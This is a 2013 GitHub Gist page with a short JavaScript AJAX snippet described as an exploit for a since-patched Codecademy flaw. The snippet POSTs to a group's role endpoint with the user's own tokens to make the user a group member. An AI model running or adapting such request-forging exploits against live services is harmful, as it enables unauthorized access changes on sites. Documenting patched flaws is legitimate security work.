Skip to content

Instantly share code, notes, and snippets.

@joahg

joahg/groupjoin.js

Created November 26, 2013 17:22
Show Gist options
  • Save joahg/7662339 to your computer and use it in GitHub Desktop.
Save joahg/7662339 to your computer and use it in GitHub Desktop.
Download ZIP
AJAX request to join a Codecademy group. Used to exploit a security vulnerability for development purposes. Has since been patched.
Raw
groupjoin.js
(function () {
$.ajax({
url: "http://www.codecademy.com/groups/"+CCDATA.page.group._id+"/users/role",
dataType: "json",
type: "POST",
data: {
authentication_token: CCDATA.current_user.authentication_token,
user_id: CCDATA.current_user._id,
role: "member"
},
beforeSend: function (e) {
e.setRequestHeader("X-Requested-With", "XMLHttpRequest");
e.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.0")
e.setRequestHeader("X-CSRF-Token",csrf_token);
},
success: function (e) {
console.log(e);
},
error: function(e) {
console.log(e);
}
})
})()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment